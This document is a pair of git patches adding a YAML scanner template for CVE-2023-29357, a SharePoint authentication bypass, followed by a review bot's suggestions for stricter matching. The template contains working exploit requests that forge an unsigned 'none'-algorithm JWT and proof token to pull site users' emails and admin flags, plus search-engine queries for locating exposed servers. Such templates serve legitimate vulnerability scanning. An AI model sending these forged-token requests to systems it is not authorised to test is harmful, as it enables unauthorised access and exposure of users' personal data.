From fd690460973dd723ad16b7f4928d1b8c638ea698 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 18:51:23 +0530
Subject: [PATCH 1/2] Added CVE-2023-29357 (Microsoft SharePoint - Authentication Bypass)

---
 http/cves/2023/CVE-2023-29357.yaml | 66 ++++++++++++++++++++++++++++++
 1 file changed, 66 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-29357.yaml

diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml
new file mode 100644
index 00000000000..d1ba80af7e8
--- /dev/null
+++ b/http/cves/2023/CVE-2023-29357.yaml
@@ -0,0 +1,66 @@
+id: CVE-2023-29357
+
+info:
+ name: Microsoft SharePoint - Authentication Bypass
+ author: pdteam
+ severity: critical
+ description: |
+ Microsoft SharePoint Server Elevation of Privilege Vulnerability
+ reference:
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357
+ - https://srcincite.io/advisories/src-2020-0022/
+ - https://github.com/Chocapikk/CVE-2023-29357
+ - https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/
+ - https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-29357
+ epss-score: 0.00267
+ epss-percentile: 0.63767
+ cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: microsoft
+ product: sharepoint_server
+ fofa-query: app="Microsoft-SharePoint"
+ shodan-query: http.headers_hash:-1968878704
+ tags: cve,cve2023,microsoft,sharepoint_server
+
+variables:
+ client_id: "00000003-0000-0ff1-ce00-000000000000"
+
+http:
+ - raw:
+ - |
+ GET /_api/web/siteusers HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Bearer
+ - |
+ GET /_api/web/siteusers HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json
+ Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
+ X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
+
+ extractors:
+ - type: regex
+ part: header
+ group: 1
+ name: realm
+ regex:
+ - realm="([^"]*)"
+ internal: true
+
+ - type: json
+ json:
+ - .value[].Email
+
+ matchers:
+ - type: word
+ words:
+ - LoginName
+ - Email
+ - IsSiteAdmin
+ condition: and

From ff450a65baf26ac7c25d8cebd5a130ec9f3ede4d Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 29 Sep 2023 19:04:39 +0530
Subject: [PATCH 2/2] strict matcher

---
 http/cves/2023/CVE-2023-29357.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml
index d1ba80af7e8..fcf079ce44b 100644
--- a/http/cves/2023/CVE-2023-29357.yaml
+++ b/http/cves/2023/CVE-2023-29357.yaml
@@ -59,6 +59,7 @@ http:
 
 matchers:
 - type: word
+ part: body_2
 words:
 - LoginName
 - Email
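Review bot: The word matcher at the end of the new template (`LoginName`/`Email`/`IsSiteAdmin` with `condition: and`) carries no `part` and no status check, so a site that already serves `/_api/web/siteusers` to an unauthenticated caller produces the same hit as one where the client-generated token is what gets the request through; PATCH 2/2 narrows it to `part: body_2`, but nothing in the chain asserts that the first, token-less request was refused. Setting `req-condition: true` on the request and adding a DSL matcher under `matchers-condition: and` ties the verdict to the token actually changing the outcome; the patch never states what the token-less probe returns, so the `!= 200` form below is deliberately conservative rather than pinning a specific status. The `{{realm}}` used in the second request exists only if the header regex extractor finds `realm="…"` in the first response (presumably its authentication challenge header), which deserves a comment above that extractor, e.g. `# realm is captured from the first response's challenge header and substituted into the second request`. Lastly, `description` is just the MSRC title; stating what the template verifies (an unauthenticated read of the site-user list using a client-generated token) and adding `remediation: Apply the vendor security update referenced in the MSRC advisory.` would make a hit actionable without opening the references.
```yaml
    req-condition: true

    # … unchanged: extractors (realm regex, json) …

    matchers-condition: and
    matchers:
      # … unchanged: word matcher (LoginName / Email / IsSiteAdmin, condition: and) …

      - type: dsl
        dsl:
          - 'status_code_1 != 200 && status_code_2 == 200'
```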